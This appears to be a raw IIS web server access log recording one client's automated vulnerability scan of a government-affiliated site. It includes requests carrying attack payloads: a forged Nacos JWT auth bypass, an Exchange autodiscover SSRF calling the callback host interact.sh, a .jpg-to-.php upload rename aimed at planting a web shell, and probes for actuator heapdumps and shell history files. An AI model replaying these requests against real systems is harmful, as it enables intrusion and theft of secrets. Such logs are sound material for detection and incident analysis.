Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205 2023-10-15 02:52:48 103.153.214.94 GET /recent_scans/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 621 2023-10-15 02:54:36 103.153.214.94 GET /wizard.htm - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 207 2023-10-15 02:58:41 103.153.214.94 GET /ui/jobs - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 213 2023-10-15 02:59:20 103.153.214.94 GET /nacos/v1/auth/users pageNo=1&pageSize=10&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 203 2023-10-15 02:59:22 103.153.214.94 GET /v1/auth/users pageNo=1&pageSize=10&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 204 2023-10-15 03:00:39 103.153.214.94 GET /autodiscover/autodiscover.json/v1.0/2WfF0pVcsFOGtwFwaCf4i27bRLd@interact.sh Protocol=Autodiscoverv1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 207 2023-10-15 03:06:11 103.153.214.94 GET /debug/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 203 2023-10-15 03:08:02 103.153.214.94 POST /php/query.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 203 2023-10-15 03:10:05 103.153.214.94 GET /info - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 207 2023-10-15 03:10:07 103.153.214.94 GET /v1/info - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 201 2023-10-15 03:10:22 103.153.214.94 GET /toolkit/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 200 2023-10-15 03:11:04 103.153.214.94 GET /connections - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 207 2023-10-15 03:11:43 103.153.214.94 GET /status full 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 205 2023-10-15 03:12:49 103.153.214.94 GET / - 443 - 193.123.37.162 - - 200 0 0 209 2023-10-15 03:12:53 103.153.214.94 GET / - 443 - 193.123.37.162 - - 200 0 0 201 2023-10-15 03:14:12 103.153.214.94 GET /phpmyadmin/index.php db=information_schema 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 205 2023-10-15 03:14:13 103.153.214.94 GET /phpMyAdmin/index.php db=information_schema 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 207 2023-10-15 03:19:21 103.153.214.94 GET /applications.pinpoint - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 205 2023-10-15 03:22:18 103.153.214.94 GET /pma/server_import.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 207 2023-10-15 03:22:20 103.153.214.94 GET /phpmyadmin/server_import.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 201 2023-10-15 03:22:22 103.153.214.94 GET /phpMyAdmin+2/server_import.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 201 2023-10-15 03:22:24 103.153.214.94 GET /db/server_import.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 202 2023-10-15 03:22:26 103.153.214.94 GET /server_import.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 199 2023-10-15 03:22:28 103.153.214.94 GET /PMA/server_import.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 202 2023-10-15 03:22:30 103.153.214.94 GET /admin/server_import.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 301 0 0 209 2023-10-15 03:22:33 103.153.214.94 GET /admin/pma/server_import.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 301 0 0 205 2023-10-15 03:22:35 103.153.214.94 GET /phpMyAdmin/server_import.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 201 2023-10-15 03:22:37 103.153.214.94 GET /admin/phpMyAdmin/server_import.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 301 0 0 201 2023-10-15 03:23:37 103.153.214.94 GET /node_modules/mqtt/test/helpers/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 203 2023-10-15 03:23:49 103.153.214.94 GET /service-discovery - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203 2023-10-15 03:25:37 103.153.214.94 GET /prometheus - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 207 2023-10-15 03:25:39 103.153.214.94 GET /actuator/prometheus - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 206 2023-10-15 03:27:33 103.153.214.94 GET /phpmyadmin/scripts/setup.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 210 2023-10-15 03:27:35 103.153.214.94 GET /phpMyAdmin/scripts/setup.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 201 2023-10-15 03:27:37 103.153.214.94 GET /_phpmyadmin/scripts/setup.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 200 2023-10-15 03:27:39 103.153.214.94 GET /forum/phpmyadmin/scripts/setup.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 200 2023-10-15 03:27:42 103.153.214.94 GET /php/phpmyadmin/scripts/setup.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 200 2023-10-15 03:27:44 103.153.214.94 GET /typo3/phpmyadmin/scripts/setup.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 205 2023-10-15 03:27:47 103.153.214.94 GET /web/phpmyadmin/scripts/setup.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 201 2023-10-15 03:27:49 103.153.214.94 GET /xampp/phpmyadmin/scripts/setup.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 200 2023-10-15 03:27:51 103.153.214.94 GET /sysadmin/phpMyAdmin/scripts/setup.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 200 2023-10-15 03:27:53 103.153.214.94 GET /phpmyadmin/setup/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205 2023-10-15 03:27:55 103.153.214.94 GET /pma/setup/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 201 2023-10-15 03:27:57 103.153.214.94 GET /admin/pma/setup/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 301 0 0 205 2023-10-15 03:27:59 103.153.214.94 GET /phpmyadmin/setup/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205 2023-10-15 03:28:01 103.153.214.94 GET /setup/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 205 2023-10-15 03:28:03 103.153.214.94 GET /admin/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 205 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-10-15 03:43:52 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-10-15 03:43:52 103.153.214.94 PUT /testing-put.txt - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 204 2023-10-15 03:43:54 103.153.214.94 GET /testing-put.txt - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 200 2023-10-15 03:44:51 103.153.214.94 GET / - 443 - 193.123.37.162 - - 200 0 0 209 2023-10-15 03:46:50 103.153.214.94 GET / pp=env 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 212 2023-10-15 03:50:10 103.153.214.94 GET /web - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 202 2023-10-15 04:01:24 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 221 2023-10-15 04:03:52 103.153.214.94 POST /php/upload.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 810 2023-10-15 04:03:53 103.153.214.94 POST /php/renamefile.php f=%2Fapp%2FUploads%2F2WfF0njP30gZpY4OCmkzZ5nv2qU.jpg&n=2WfF0njP30gZpY4OCmkzZ5nv2qU.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 204 2023-10-15 04:03:55 103.153.214.94 POST /php/movefile.php f=%2Fapp%2FUploads%2F2WfF0njP30gZpY4OCmkzZ5nv2qU.jpg&n=%2Fapp%2FUploads%2F2WfF0njP30gZpY4OCmkzZ5nv2qU.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 205 2023-10-15 04:03:57 103.153.214.94 GET /Uploads/2WfF0njP30gZpY4OCmkzZ5nv2qU.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 202 2023-10-15 04:05:27 103.153.214.94 GET /irj/go/km/navigation/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 580 2023-10-15 04:07:41 103.153.214.94 GET /sap/public/info - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 207 2023-10-15 04:12:47 103.153.214.94 POST /seeyon/thirdpartyController.do - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 405 0 1 204 2023-10-15 04:15:42 103.153.214.94 GET /server-status - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205 2023-10-15 04:15:42 103.153.214.94 GET /wd/hub - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 200 2023-10-15 04:16:24 103.153.214.94 GET /setup/start - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 203 2023-10-15 04:20:15 103.153.214.94 GET /.bash_history - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 204 2023-10-15 04:20:18 103.153.214.94 GET /.ksh_history - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 203 2023-10-15 04:20:21 103.153.214.94 GET /.sh_history - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 622 2023-10-15 04:20:23 103.153.214.94 GET /.zsh_history - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 199 2023-10-15 04:20:27 103.153.214.94 GET /sitecore/' - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 205 2023-10-15 04:21:59 103.153.214.94 GET /api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview previewPath=/App_Data/license.xml 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 0 2 228 2023-10-15 04:23:13 103.153.214.94 GET /index.php s=/install/index/index 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 203 2023-10-15 04:23:25 103.153.214.94 GET /slurm/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 201 2023-10-15 04:23:56 103.153.214.94 GET /Admin/frmWelcome.aspx - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 301 0 0 205 2023-10-15 04:23:56 103.153.214.94 GET /admin/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 https://bcvt.kontum.gov.vn/Admin/frmWelcome.aspx 200 0 0 203 2023-10-15 04:25:52 103.153.214.94 GET /smokeping/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 204 2023-10-15 04:35:19 103.153.214.94 GET /admin/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 209 2023-10-15 04:35:21 103.153.214.94 GET /solr/admin/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 202 2023-10-15 04:35:25 103.153.214.94 GET /api/components/search_projects - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 0 2 214 2023-10-15 04:35:46 103.153.214.94 GET /api/components/suggestions recentlyBrowsed 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 0 2 209 2023-10-15 04:36:39 103.153.214.94 GET /log/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 204 2023-10-15 04:39:50 103.153.214.94 GET /autoconfig - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 206 2023-10-15 04:39:52 103.153.214.94 GET /actuator/autoconfig - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 201 2023-10-15 04:41:22 103.153.214.94 GET /beans - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 203 2023-10-15 04:41:24 103.153.214.94 GET /actuator/beans - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 205 2023-10-15 04:42:59 103.153.214.94 GET /caches - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 208 2023-10-15 04:43:01 103.153.214.94 GET /actuator/caches - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 202 2023-10-15 04:43:01 103.153.214.94 GET /conditions - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 199 2023-10-15 04:43:02 103.153.214.94 GET /actuator/conditions - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 200 2023-10-15 04:44:33 103.153.214.94 GET /configprops - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 203 2023-10-15 04:44:34 103.153.214.94 GET /actuator/configprops - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 200 2023-10-15 04:45:32 103.153.214.94 GET /dump - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 202 2023-10-15 04:45:34 103.153.214.94 GET /actuator/dump - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 200 2023-10-15 04:54:37 103.153.214.94 GET /features - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 208 2023-10-15 04:54:39 103.153.214.94 GET /actuator/features - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 206 2023-10-15 04:54:52 103.153.214.94 GET /flyway - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 206 2023-10-15 04:54:54 103.153.214.94 GET /actuator/flyway - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 199 2023-10-15 04:55:46 103.153.214.94 GET /env - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 201 2023-10-15 04:55:48 103.153.214.94 GET /actuator/env - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 200 2023-10-15 04:55:50 103.153.214.94 GET /actuator;/env; - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 200 2023-10-15 04:55:52 103.153.214.94 GET /message-api/actuator/env - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 201 2023-10-15 04:56:01 103.153.214.94 GET /gateway/routes - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 201 2023-10-15 04:56:03 103.153.214.94 GET /actuator/gateway/routes - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 202 2023-10-15 05:00:21 103.153.214.94 GET /GuXxck - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 205 2023-10-15 05:00:21 103.153.214.94 GET /heapdump - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 200 2023-10-15 05:00:23 103.153.214.94 GET /actuator/heapdump - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 205 2023-10-15 05:12:18 103.153.214.94 GET /httptrace - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 207 2023-10-15 05:12:20 103.153.214.94 GET /actuator/httptrace - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 200 2023-10-15 05:16:43 103.153.214.94 GET /jolokia - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 201 2023-10-15 05:16:45 103.153.214.94 GET /actuator/jolokia - 443 - 193.123.37.162 